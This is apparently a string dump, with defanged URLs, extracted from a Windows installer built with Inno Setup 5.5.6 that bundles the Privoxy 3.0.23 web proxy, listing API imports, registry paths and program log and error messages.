EXITSETUPMSGBOX

GETWINDOWSVERSION

GETWINDOWSVERSIONSTRING

SUPPRESSIBLEMSGBOX

GetWindowsVersionEx

IMsgt

Inno Setup Setup Data (5.5.6) (u)

Inno Setup Messages (5.5.3) (u)

oleaut32.dll

advapi32.dll

RegOpenKeyExW

RegCloseKey

user32.dll

GetKeyboardType

kernel32.dll

UnhookWindowsHookEx

SetWindowsHookExW

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjects

MapVirtualKeyW

LoadKeyboardLayoutW

GetKeyboardState

GetKeyboardLayoutNameW

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextW

GetAsyncKeyState

ExitWindowsEx

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

msimg32.dll

gdi32.dll

SetViewportOrgEx

version.dll

mpr.dll

TransactNamedPipe

SetNamedPipeHandleState

GetWindowsDirectoryW

GetCPInfo

CreateNamedPipeW

RegQueryInfoKeyW

RegFlushKey

RegEnumKeyExW

RegDeleteKeyW

RegCreateKeyExW

comctl32.dll

ole32.dll

shell32.dll

ShellExecuteExW

ShellExecuteW

comdlg32.dll

`.rdata

@.data

.pdata

COMCTL32.dll

SHLWAPI.dll

SetProcessShutdownParameters

KERNEL32.dll

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX

KWindows

6MsgIDs

Msgs

UrlMon

.rsrc

@.reloc

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

shlwapi.dll

SOFTWARE\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation

RegKey

GetWindowsDirectoryA

RegOpenKeyA

RegCreateKeyExA

SHFOLDER.dll

dll\shfolder.dbg

Font.Color

Font.Height

Font.Name

Font.Style

Lines.Strings

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

%s_%d

USER32.DLL

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes

uxtheme.dll

DWMAPI.DLL

clWebSnow

clWebFloralWhite

clWebLavenderBlush

clWebOldLace

clWebIvory

clWebCornSilk

clWebBeige

clWebAntiqueWhite

clWebWheat

clWebAliceBlue

clWebGhostWhite

clWebLavender

clWebSeashell

clWebLightYellow

clWebPapayaWhip

clWebNavajoWhite

clWebMoccasin

clWebBurlywood

clWebAzure

clWebMintcream

clWebHoneydew

clWebLinen

clWebLemonChiffon

clWebBlanchedAlmond

clWebBisque

clWebPeachPuff

clWebTan

clWebYellow

clWebDarkOrange

clWebRed

clWebDarkRed

clWebMaroon

clWebIndianRed

clWebSalmon

clWebCoral

clWebGold

clWebTomato

clWebCrimson

clWebBrown

clWebChocolate

clWebSandyBrown

clWebLightSalmon

clWebLightCoral

clWebOrange

clWebOrangeRed

clWebFirebrick

clWebSaddleBrown

clWebSienna

clWebPeru

clWebDarkSalmon

clWebRosyBrown

clWebPaleGoldenrod

clWebLightGoldenrodYellow

clWebOlive

clWebForestGreen

clWebGreenYellow

clWebChartreuse

clWebLightGreen

clWebAquamarine

clWebSeaGreen

clWebGoldenRod

clWebKhaki

clWebOliveDrab

clWebGreen

clWebYellowGreen

clWebLawnGreen

clWebPaleGreen

clWebMediumAquamarine

clWebMediumSeaGreen

clWebDarkGoldenRod

clWebDarkKhaki

clWebDarkOliveGreen

clWebDarkgreen

clWebLimeGreen

clWebLime

clWebSpringGreen

clWebMediumSpringGreen

clWebDarkSeaGreen

clWebLightSeaGreen

clWebPaleTurquoise

clWebLightCyan

clWebLightBlue

clWebLightSkyBlue

clWebCornFlowerBlue

clWebDarkBlue

clWebIndigo

clWebMediumTurquoise

clWebTurquoise

clWebCyan

clWebPowderBlue

clWebSkyBlue

clWebRoyalBlue

clWebMediumBlue

clWebMidnightBlue

clWebDarkTurquoise

clWebCadetBlue

clWebDarkCyan

clWebTeal

clWebDeepskyBlue

clWebDodgerBlue

clWebBlue

clWebNavy

clWebDarkViolet

clWebDarkOrchid

clWebMagenta

clWebDarkMagenta

clWebMediumVioletRed

clWebPaleVioletRed

clWebBlueViolet

clWebMediumOrchid

clWebMediumPurple

clWebPurple

clWebDeepPink

clWebLightPink

clWebViolet

clWebOrchid

clWebPlum

clWebThistle

clWebHotPink

clWebPink

clWebLightSteelBlue

clWebMediumSlateBlue

clWebLightSlateGray

clWebWhite

clWebLightgrey

clWebGray

clWebSteelBlue

clWebSlateBlue

clWebSlateGray

clWebWhiteSmoke

clWebSilver

clWebDimGray

clWebMistyRose

clWebDarkSlateBlue

clWebDarkSlategray

clWebGainsboro

clWebDarkGray

clWebBlack

\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\

crSQLWait

%s (%s)

imm32.dll

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

RegDeleteKeyExW

.DEFAULT\Control Panel\International

%s, ClassID: %s

%s, ProgID: "%s"

oleacc.dll

MSFTEDIT.DLL

RICHED20.DLL

Rstrtmgr.dll

File I/O error %d

Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

WININIT.INI

Software\Microsoft\Windows\CurrentVersion\SharedDLLs

RegCreateKeyEx

RegOpenKeyEx

sfc.dll

cmd.exe" /C "

COMMAND.COM" /C

PendingFileRenameOperations

PendingFileRenameOperations2

@Software\Microsoft\Windows\CurrentVersion\Fonts

Software\Microsoft\Windows NT\CurrentVersion\Fonts

IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)

IPropertyStore::SetValue(PKEY_AppUserModel_ID)

IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)

IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)

OLEAUT32.DLL

Log opened. (Time zone: UTC%s%.2u:%.2u)

%s Log %s #%.3u.txt

regsvr32.exe"

Cannot register 64-bit DLLs on this version of Windows

HELPER_EXE_AMD64

Cannot utilize 64-bit features on this version of Windows

64-bit helper EXE wasn't extracted

\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x

CreateNamedPipe

helper %d 0x%x

Helper process PID: %u

Stopping 64-bit helper process. (PID: %u)

Helper process exited with failure code: 0x%x

TransactNamedPipe/GetOverlappedResult

Helper: Command did not execute

SOFTWARE\Microsoft\.NETFramework

.NET Framework not found

SOFTWARE\Microsoft\.NETFramework\Policy\v4.0

v4.0.30319

SOFTWARE\Microsoft\.NETFramework\Policy\v2.0

v2.0.50727

SOFTWARE\Microsoft\.NETFramework\Policy\v1.1

v1.1.4322

.NET Framework version %s not found

Fusion.dll

Failed to load .NET Framework DLL "%s"

Failed to get address of .NET Framework CreateAssemblyCache function

.NET Framework CreateAssemblyCache function failed

MoveFileEx failed (%d).

Deleting directory: %s

Failed to delete directory (%d). Will retry later.

Failed to delete directory (%d). Will delete on restart (if empty).

Failed to delete directory (%d).

Deleting file: %s

Failed to delete the file; it may be in use (%d).

The file appears to be in use (%d). Will delete on restart.

Decrementing shared count (%d-bit): %s

Unregistering 64-bit DLL/OCX: %s

Unregistering 32-bit DLL/OCX: %s

Not unregistering DLL/OCX again: %s

Unregistering 64-bit type library: %s

Unregistering 32-bit type library: %s

Uninstalling from GAC: %s

Running Exec filename:

Running Exec parameters:

CreateProcess failed (%d).

Process exit code: %u

Running ShellExec filename:

Running ShellExec parameters:

ShellExecuteEx failed (%d).

Skipping RunOnceId "%s" filename: %s

Unregistering font: %s

zlib: Internal error. Code %d

bzlib: Internal error. Code %d

lzmadecomp: %s

lzmadecomp: Compressed data is corrupted (%d)

DecodeToBuf failed (%d)

c:\directory

Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Could not find page with ID %d

Software\Microsoft\Windows\CurrentVersion\Uninstall

%s\%s_is1

RestartManager found an application using one of our files: %s

Can use RestartManager to avoid reboot? %s (%d)

PrepareToInstall failed: %s

Need to restart Windows? %s

/:*?"<>|

\/:*?"<>|

%s-%d.bin

%s-%d%s.bin

..\DISK%d\

Asking user for new disk containing "%s".

Cannot read an encrypted file before the key has been set

LoggedMsgBox returned an unexpected value. Assuming Abort.

Software\Microsoft\Windows\CurrentVersion\Fonts

Software\Microsoft\Windows\CurrentVersion\Uninstall\

5.5.6 (u)

URLInfoAbout

URLUpdateInfo

Creating directory: %s

Setting permissions on directory: %s

Failed to set permissions on directory (%d).

Setting NTFS compression on directory: %s

Unsetting NTFS compression on directory: %s

Failed to set NTFS compression state (%d).

Failed to set value in Fonts registry key.

Failed to open Fonts registry key.

Setting permissions on file: %s

Failed to set permissions on file (%d).

Setting NTFS compression on file: %s

Unsetting NTFS compression on file: %s

Dest filename: %s

Dest file is protected by Windows File Protection.

Time stamp of our file: %s

Time stamp of existing file: %s

Version of our file: %u.%u.%u.%u

Version of existing file: %u.%u.%u.%u

Existing file is protected by Windows File Protection. Skipping.

Uninstaller requires administrator: %s

The existing file appears to be in use (%d). Will replace on restart.

The existing file appears to be in use (%d). Retrying.

Registering file as a font ("%s")

Cannot install files to 64-bit locations on this version of Windows

desktop.ini

.ShellClassInfo

{0AFACED1-E828-11D1-9187-B532F1E9575D}

target.lnk

Desktop.ini

Software\Microsoft\Windows\CurrentVersion\App Paths\

Section: %s

Entry: %s

Value: %s

Updating the .INI file.

Successfully updated the .INI file.

Skipping updating the .INI file, only updating uninstall log.

Setting permissions on registry key: %s\%s

Could not set permissions on the registry key because it currently does not exist.

Failed to set permissions on registry key (%d).

Cannot access 64-bit registry keys on this version of Windows

Registration executable created: %s

Software\Microsoft\Windows\CurrentVersion\RunOnce

Registering 64-bit DLL/OCX: %s

Registering 32-bit DLL/OCX: %s

Registering 64-bit type library: %s

Registering 32-bit type library: %s

Directory for uninstall files: %s

Will append to existing uninstall log: %s

Will overwrite existing uninstall log: %s

Creating new uninstall log: %s

LoggedMsgBox returned an unexpected value. Assuming Cancel.

RmShutdown returned an error: %d

Fatal exception during installation process (%s):

ExtractTemporaryFile: The file "%s" was not found

ExtractTemporaryFiles: No files matching "%s" found

Invalid symbol '%s' found

Invalid token '%s' found

QuerySpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected status: %d

ShellExecuteEx

ShellExecuteEx returned hProcess=0

Wnd=$%x

Expression error '%s'

SuppressMsgBoxes

srcexe

Cannot evaluate "%s" constant during Uninstall

Cannot access a 64-bit key in a "reg" constant on this version of Windows

Unknown custom message name "%s" in "cm" constant

Cannot expand "pf64" constant on this version of Windows

Cannot expand "cf64" constant on this version of Windows

uninstallexe

Cannot expand "dotnet2064" constant on this version of Windows

Cannot expand "dotnet4064" constant on this version of Windows

Failed to expand shell folder constant "%s"

Unknown constant "%s"

Software\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

cmd.exe

COMMAND.COM

\_setup64.tmp

_isetup\_shfoldr.dll

Failed to get version numbers of _shfoldr.dll

shfolder.dll

Failed to load DLL "%s"

Found pending rename or delete that matches one of our files: %s

Windows version: %u.%u.%u%s (NT platform: %s)

64-bit Windows: %s

Processor architecture: %s

Defaulting to %s for suppressed message box (%s):

Message box (%s):

User chose %s.

MsgBox failed.

/SPAWNWND=$%x /NOTIFYWND=$%x

64-bit install mode: %s

_isetup\_isdecmp.dll

_isetup\_iscrypt.dll

/Password=

/SuppressMsgBoxes

/DETACHEDMSG

-0.bin

Setup version: Inno Setup version 5.5.6 (u)

Original Setup EXE:

Not restarting Windows because Setup is being run from the debugger.

Restarting Windows.

Inno Setup version 5.5.6 (u)

Portions Copyright (C) 2000-2015 Martijn Laan

hXXp://VVV.innosetup.com/

hXXp://VVV.remobjects.com/ps

hXXp://VVV.graphical-installer.com/

Cannot run files in 64-bit locations on this version of Windows

Type: Exec

Type: ShellExec

RmRestart returned an error: %d

Need to restart Windows, not attempting to restart applications

Will not restart Windows automatically.

RegDeleteKeyExA

System\CurrentControlSet\Control\Windows

Cannot call "%s" function during Setup

Cannot call "%s" function during Uninstall

Invalid RootKey value

Unknown custom message name "%s"

%u.%.2u.%u

%u.%u.%u.%u

Cannot disable FS redirection on this version of Windows

Runtime Error (at %d:%d):

Exception "%s" at address %p

TScriptRunner.SetPSExecParameters: Invalid type

TScriptRunner.LoadScript failed

Remove shared file %s? User chose %s%s

/INITPROCWND=$%x

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x

Original Uninstall EXE:

Install was done in 64-bit mode but not running 64-bit Windows now

Removed all? %s

Not restarting Windows because Uninstall is being run from the debugger.

isRS-???.tmp

isRS-%.3u.tmp

DisableProcessWindowsGhosting

Interface not supported

7Dispatch methods do not support more than 64 parameters

Exception: %s

Cannot Import %s

Unable to insert a line Clipboard does not support Icons

Text exceeds memo capacity/Menu '%s' is already being used by another form

- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.

Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'

No help found for %s

Unsupported clipboard format

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Thread creation error: %s

Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters#''%s'' is not a valid integer value

Cannot open file "%s". %s

Invalid file name - %s

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Failed to get data for '%s'

Resource %s not found"Character index out of bounds (%d)

Start index out of bounds (%d)

Invalid count (%d)

Invalid destination index (%d)

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Object lock not owned(Monitor support function not initialized

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation

Invalid NULL variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

External exception %x

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

I/O error %d

Integer overflow Invalid floating point operation

n%USERPROFILE%

r%SYSTEMROOT%

5.50.4807.2300

Microsoft(R) Windows (R) 2000 Operating System

Datos de programa%Configuraci

51.1052.0.0

privoxy.exe_596:

.text

P`.data

.rdata

`@.bss

.idata

.rsrc

 downgrade-http-version

-downgrade-http-version

Action '%s' is no longer valid in this Privoxy release. Ignored.

Unknown action or alias: %s

Updated action bits based on: %s

Loading actions file: %s

While loading actions file '%s': invalid line (%lu): %s

can't load actions file '%s': out of memory

can't load actions file '%s': line %lu: {{description}} must only appear once, and only a {{settings}} block may be above it.

can't load actions file '%s': line %lu: {{settings}} must only appear once, and it must be before anything else.

Actions file '%s', line %lu requires newer Privoxy version: %s

can't load actions file '%s': line %lu: {{alias}} must only appear once, and it must be before all actions.

Missing filter '%s'

Invalid action section in file '%s', starting at line %lu: %s

can't load actions file '%s': out of memory!

can't load actions file '%s': INTERNAL ERROR - mode = %d

can't load actions file '%s': line %lu: cannot create URL or TAG pattern from: %s

can't load actions file '%s': invalid line (%lu): %s

can't load actions file '%s': Missing trailing '}' in action section starting at line (%lu): %s

can't load actions file '%s': can't completely parse the action section starting at line (%lu): %s

can't load actions file '%s': invalid alias line (%lu): %s

can't load actions file '%s': line %lu should begin with a '{': %s

can't load actions file '%s': invalid alias line (%lu): %s = %s

can't load actions file '%s': invalid line (%lu): {{ }}

can't load actions file '%s': %E. Note that beginning with Privoxy 3.0.7, actions files have to be specified with their complete file names.

can't load actions file '%s': invalid line (%lu): {{%s}}

can't load actions file '%s': error opening file: %E

-downgrade-http-version \

 downgrade-http-version \

downgrade-http-version

 %s{%s}

show-url-info

Look up which actions apply to a URL and why

edit-actions-for-url

edit-actions-url

edit-actions-url-form

edit-actions-add-url

edit-actions-add-url-form

edit-actions-remove-url

edit-actions-remove-url-form

error-favicon.ico

favicon.ico

robots.txt

url-info-osd.xml

HTTP/1.0 500 Internal Privoxy Error

<link rel="shortcut icon" href="hXXp://config.privoxy.org/error-favicon.ico" type="image/x-icon"></head>

<p>Please <a href="hXXp://sourceforge.net/tracker/?group_id=11118&atid=111118">file a bug report</a>.</p>

%s%d%s

actions-file.html#

hXXp://

config.privoxy.org

%a, %d %b %Y %H:%M:%S GMT

HTTP/1.0

HTTP/1.1

%s %s

Preparing to give head to %s.

Content-Length: %d

Out of memory while generating template path for %s.

Out of memory while generating full template path for %s.

Not enough free memory to buffer %s.

Cannot open template file %s: %E

Substituting: s/%s/%s/%s

Error compiling template fill job %s: %d

Failed to execute s/%s/%s/%s. %s

exports

hXXp://config.privoxy.org/

else-not-%s@.*@endif-%s

if-%s-then

endif-%s

if-%s-then@.*@else-not-%s

if-%s-start.*if-%s-end

3.0.23

%a %b %d %X %Z %Y

my-port

hXXp://config.privoxy.org/user-manual/

hXXp://VVV.privoxy.org/

proxy-info-url

Failed to fill in url.

hXXp://p.p/

CGI request with unsupported method received: %s

config.privoxy.org.

Granting access to %s, referrer %s is trustworthy.

Unexpected CGI error %d in top-level handler. Please file a bug report!

Denying access to %s, referrer %s isn't trustworthy.

Denying access to %s. No referrer found.

hostport

hXXps://

Unknown socks type: %d.

if-%s-start

if-%s-end

.action

The CGI editor will be turned off after another %d mismatche(s).

hXXp://config.privoxy.org/edit-actions-list?f=default

all-urls-present

default.action

edit-actions-list-url

urls

url-1-2

url-html

all-urls-s-next

all-urls-actions

all-urls-s

all-urls-buttons

edit-actions-for-url-filter

check-decoded-url

fast-redirects-param-check-decoded-url

attachment; filename=WHATEVER.txt

[email protected]

Privoxy 3.0.23

hXXp://localhost/

hXXp://config.privoxy.org/send-banner?type=pattern

hXXp://config.privoxy.org/edit-actions-list?foo=%lu&f=%i#l%u

hXXp://config.privoxy.org/edit-actions-list?foo=%lu&f=%u#l%u

hXXp://config.privoxy.org/edit-actions-list?foo=%lu&f=%u

filter_r%x

filter_n%x

filter_t%x

Unknown filter type: %c for filter %s. Filter ignored.

hXXp://config.privoxy.org/send-banner?type=

hXXp://p.p/send-banner?type=

cgi-style.css

Could not find cgi-style.css template

url-given

https

standard.action

<a class="cmd" href="/show-status?file=actions&index=%d">

(err != JB_ERR_OK) || (url_to_query->ssl == !strncmpic(url_param, "hXXps://", 8))

<a class="cmd" href="/edit-actions-list?f=%d">

<b>[Invalid URL specified!]</b>

http-forwarder

valid-url

forward-port

gateway-port

Unexpected error while fseek()ing to the end of %s: %E

Unexpected ftell() error while loading %s: %E

Unexpected error while fseek()ing to the beginning of %s: %E

Couldn't completely read file %s.

Failed to open %s: %E

FEATURE_IPV6_SUPPORT

</td><td class="buttons"><a href="/show-status?file=actions&index=%u">View</a>

</td><td class="buttons"><a href="/show-status?file=filter&index=%u">View</a>

  <a href="/edit-actions-list?f=%u">Edit</a>

.jpeg

index.html

Rejecting the request to serve '%s' as it contains '/' or '..'

Content-Type guessed for %s: %s

colormap length = %d (%c)?

#$%&'()* ,-./0123456789:;

Fatal error. You're not supposed tosee this message. Please file a bug report.

%Y-%m-%d %H:%M:%S

%s lx %s:

%s lx Fatal error: log_error()'s sanity checks failed.length: %d. Exiting.

%s lx Fatal error: Out of memory in log_error().

Bad format string: "%s"

%d/%b/%Y:%H:%M:%S

% 03dd

WSAEAFNOSUPPORT - Address family not supported by protocol family.

WSAEALREADY - Operation already in progress.

WSAEINPROGRESS - Operation now in progress.

WSAEMSGSIZE - Message too long.

WSAENOTSOCK - Socket operation on non-socket.

WSAEOPNOTSUPP - Operation not supported.

WSAEPFNOSUPPORT - Protocol family not supported.

WSAEPROTONOSUPPORT - Protocol not supported.

WSAESOCKTNOSUPPORT - Socket type not supported.

WSAVERNOTSUPPORTED - WINSOCK.DLL version out of range.

(error number %d)

No logfile configured. Please enable it before reporting any problems.

Privoxy version 3.0.23

Program name: %s

(Re-)Opening logfile '%s'

init_error_log(): can't open logfile: '%s'

Failed to reopen logfile: '%s'. Retrying after closing the old file descriptor first. If that doesn't work, Privoxy will exit without being able to log a message.

Can not resolve [%s]:%s: %s

Overwriting Content-Type with %s

force-support

Forbidden CONNECT port.

connect_port_is_forbidden(csp)

At least one of the variables in '%s' had to be truncated before compilation

Compiling dynamic pcrs job '%s' for '%s' failed with error code %d: %s

pcrs command "%s" changed "%s" to "%s" (%u hi%s).

pcrs command "%s" didn't change "%s".

pcrs command "%s" changed "%s" to "%s" (%u hi%s), but the result doesn't look like a valid URL and will be ignored.

executing pcrs command "%s" to rewrite %s failed: %s

old_url

Checking "%s" for encoded redirects.

Checking "%s" for unencoded redirects.

Unable to decode "%s".

Out of memory while decoding URL: %s

No pcrs command recognized, assuming that "%s" is already properly formatted.

New URL "%s" and old URL "%s" are the same. Redirection loop prevented.

Percent-encoding redirect URL: %N

FALSE == url_requires_percent_encoding(new_url)

New URL is: %s

Failed to append new entry for '%s' to trustfile '%s': %E

Failed to append '%s' to trustfile '%s': %E

<li>%s</li>

<li> <a href="%s">%s</a><br>

Skipped filter '%s' after job number %u: %s (%d)

filtering %s%s (size %d) with '%s' produced %d hits (new size %d).

Filter %s has empty joblist. Nothing to do.

Success! GIF shrunk from %d bytes to %d.

De-chunking successful. Shrunk from %d to %d

Chunk size %u exceeds buffered data left. Already digested %u of %u buffered bytes.

can't allocate memory for forward-override{%s}

Invalid forward-override syntax in: %s

Overriding forwarding settings based on '%s'

Detected header '%s' in OPTIONS or TRACE request. Returning 501.

Marking open socket %d for %s:%d in slot %d as unused.

Remembering socket %d for %s:%d in slot %d.

No free slots found to remember socket for %s:%d. Last slot %d.

reusable_connection[slot].in_use

reusable_connection[slot].in_use == 0

reusable_connection[slot].forward_port == 0

reusable_connection[slot].forward_host == NULL

reusable_connection[slot].forwarder_type == SOCKS_NONE

reusable_connection[slot].gateway_port == 0

reusable_connection[slot].gateway_host == NULL

Initialized %d socket slots.

Forgetting socket %d for %s:%d in slot %d.

Forwarding proxy mismatch. Previous proxy: %s. Current proxy: %s

Gateway mismatch. Previous gateway: %s. Current gateway: %s

The connection to %s:%d in slot %d timed out. Closing socket %d. Timeout is: %d. Assumed latency: %d.

The connection to %s:%d in slot %d is no longer usable. Closing socket %d.

Internal error in forwarded_connect(). Bad proxy type: %d

Created new connection to %s:%d on socket %d.

socks5_connect: %s

socks4_connect: %s

Found reusable socket %d for %s:%d in slot %d. Timestamp made %d seconds ago. Timeout: %d. Latency: %d. Requests served: %d

invalid gateway port specified.

invalid gateway port specified

socks4_connect: %s %s

SOCKS request rejected for reason code %d.

Optimistically sending %d bytes of client headers intended for %s

optimistically writing header to: %s failed: %E

SOCKS request rejected because the client program and identd report different user-ids.

SOCKS5 domain names unsupported

to socket %d: %N

from socket %d: %N

Port number (%d) ASCII decimal representation doesn't fit into 6 bytes

Invalid port number

Can not resolve %s: %s

Failed to get the host name from the socket structure: %s

Connected to %s[%s]:%s.

Attempt %d of %d to connect to %s failed. Trying again.

Could not connect to [%s]:%s: %s.

Could not get the state of the connection to [%s]:%s: %s; dropping connection.

select() on socket %d failed: %E

Failed to drain socket %d: %E

Drained %d bytes before closing socket %d

Giving up draining socket %d

Unable to resolve my own IP address: %s

Unable to print my own IP address: %s

select(2) reported connected clients (number = %u, descriptor boundary = %u), but none found.

Can not save csp->ip_addr_str: %s

Waiting on new client failed because of problems in select(2): %s.

Setting SO_LINGER on socket %d failed.

Timeout #%u while trying to resolve %s. Trying again.

could not resolve hostname %s

hostname %s resolves to unknown address type.

HTTP/1.1 503 Too many open connections

Proxy-Agent: Privoxy 3.0.23

HTTP/1.1 502 Server or forwarder response invalid

Bad response. The server or forwarder response doesn't look like HTTP.

HTTP/1.1 200 Connection established

Proxy-Agent: Privoxy/3.0.23

HTTP/1.1 400 Invalid header received from client

HTTP/1.1 504 Connection timeout

HTTP/1.1 400 Invalid request received from client

Invalid request. Privoxy doesn't support gopher.

Invalid request. Privoxy doesn't support FTP.

HTTP/1.1 400 Bad request received from client

HTTP/1.1 400 Malformed request after rewriting

HTTP/1.1 400 Failed reading client body

HTTP/1.1 417 Expecting too much

Privoxy detected an unsupported Expect header value.

%s: %s

%s - - [%T] "%s" %s %u

Couldn't deliver the error message through client socket %d: %E

Unsupported HTTP feature

NULL != http->host

server_connection->gateway_port == 0

server_connection->forward_port == 0

Marking the server socket %d tainted.

GET PTF://

%s tried to use Privoxy as %s proxy: %s

%s - - [%T] "%s" 400 0

No complete request line received yet. Continuing reading from %d.

No request line on socket %d received in time. Timeout: %d.

Ignored force prefix in request: "%s".

Couldn't parse request line received from %s: %s

%s - - [%T] "Invalid request" 400 0

Enforcing request: "%s".

The client side of the connection on socket %d got closed without sending a complete request line.

%s's request: '%s' is invalid. Privoxy isn't configured to accept intercepted requests.

Chunked client body completely read. Length: %d

Complete client request followed by %d bytes of pipelined data received.

Rejecting request from client %s with unsupported Expect header value

%s - - [%T] "%s" 417 0

Privoxy was unable to get the destination for %s's request:

Couldn't parse rewritten request: %s.

%s - - [%T] "Invalid request generated" 500 0

Failed to parse client request from %s.

Out of memory writing HTTP command

New HTTP Request-Line: %s

via [%s]:%d to: %s

Rewrite detected: %s

%s - - [%T] "Failed reading chunked client body" 400 0

Request from %s marked for blocking. limit-connect{%s} doesn't allow CONNECT requests to %s

Possible pipeline attempt detected. The connection will not be kept alive and we will only serve the first request.

to %s

to %s successful

Done reading from server. Content length: %llu as expected. Bytes most recently read: %d.

Waiting for up to %d bytes from the client.

Expected client content length set to %llu after reading %d bytes.

%s - - [%T] "%s" 200 %llu

read from: %s failed: %E

Stopping to watch the client socket %d. There's already another request waiting.

The client closed socket %d while the server socket %d is still open.

HTTP/1.1 100

Out of memory while enlisting server headers. %s lost.

Didn't receive data in time: %s

Failed sending request body to: %s: %E

write to: %s failed: %E

Done reading from server. Expected content length: %llu. Actual content length: %llu. Bytes most recently read: %d.

Continuing buffering server headers from socket %d. Bytes most recently read: %d.

No server or forwarder response received on socket %d. Closing client socket %d without sending data.

%s - - [%T] "%s" 502 0

No server or forwarder response received on socket %d.

Invalid server or forwarder response. Starts with: %s

!http->ssl

Failed sending request headers to: %s: %E

NULL != acceptable_connect_ports

Closing server socket %d connected to %s. Total requests: %u.

Reusing server socket %d connected to %s. Total requests: %u.

http->ssl == 0

Shifting %d pipelined bytes by %d bytes

Accepted connection from %s on socket %d

Closing server socket %d connected to %s. Keep-alive %u. Tainted: %u. Socket alive %u. Timeout: %u.

Closing server socket %d connected to %s. Keep-alive: %u. Tainted: %u. Socket alive: %u. Timeout: %u. Configuration file change detected: %u

Closing client socket %d. Keep-alive: %u. Socket alive: %u. Data available: %u. Configuration file change detected: %u. Requests received: %u.

